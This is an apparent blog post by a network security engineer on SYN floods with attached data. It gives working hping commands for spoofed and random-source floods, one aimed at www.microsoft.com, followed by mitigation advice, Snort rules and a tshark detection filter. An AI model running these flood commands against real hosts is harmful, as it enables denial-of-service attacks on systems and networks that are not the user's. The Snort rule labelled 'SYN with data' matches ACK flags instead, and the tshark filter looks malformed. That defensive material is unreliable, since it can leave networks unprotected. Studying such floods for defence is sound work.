The switch for this type of attack is simple;
hping -a "insertmyspoofaddress" -S -d 500 -p 80 -i em0 220.127.116.11
The above tells hping to conduct a synflood, but also to set the data and size at 500bytes, and use a spoof'd address ( -a ) against the target host 18.104.22.168 and port 80.
I could have also use random spoof'd address ,which is more typical for this type of attack;
hping --rand-source -S -d 500 -p 80 -i em0 www.microsoft.com
( yes I hate windows :) )
NOTE: You will need super-user or root on the atatcking host, due to the permissions with opening ports greater than 1024 or you will get the following errors,
$ hping -a -S -d 500 -p 80 -i em0 22.214.171.124
[open_sockraw] socket(): Permission denied
[main] can't open
Okay simple, now why would one do this?
Easily to exhaust services on a host and the fact that most firewall will allow this type of traffic thru unchallenged. Due to this above gap, and with no mitigation or alerting device, you are susceptible to a simple L4 attacks. The data payload that attached to this attack, could also flood the target destination and cause issues within the attacked network monitoring systems.
This type of attack, is not as effective when a CDN or SLB is in place. Since these systems would distributed traffic amongst all available servers at that edge-server ( CDN) or all active & up real-servers mapped on the SLB, thus reducing the impact to just one host ip_address.
To mitigate this attack you have a choice of options but the most easiest is to apply a filter that says, if any SYN packet or even SYN-ACK arrives with a payload to drop the datagram. You can do this on most firewall or better yet on a IDS/IPS system.
! kfelix snort rules LOCATION SEATTLE
var INTERNALNET01 217.x.x.0/24
var HTTP 80
var HTTPS 443
var MAIL 25
var POP 110
var EXTERNAL_NET !$INTERNALNET01
alert tcp $EXTERNAL_NET any -> $INTERNALNET01 any ( flags: A; dsize: 1<>1460; msg:"SYN with data";)
alert tcp $EXTERNAL_NET any -> $INTERNALNET01 any ( flags: SA; dsize: 1<>1460; msg:"SYN ACK with data";)
So know we have some type of protection from SYN floods-atatcks, and within SYN or SYN_ACK floods and if any data payload is present. I would use a snort.rule checker like porcus, to validate the rule before submitting and loading. But the above will give you a basic ideal on how to alert on packets of this nature.
You could have done the same for any FIN, and FIN-ACK datagrams.
Now to detect, you can use wireshark or tshark to monitor;
tshark -n -i eth1 'tcp==2' -R 'tcp.len >0'
I hope you found this post helpful, & happy packet forging
Freelance Network Security Engineer
kfelix at hyperfeed dot com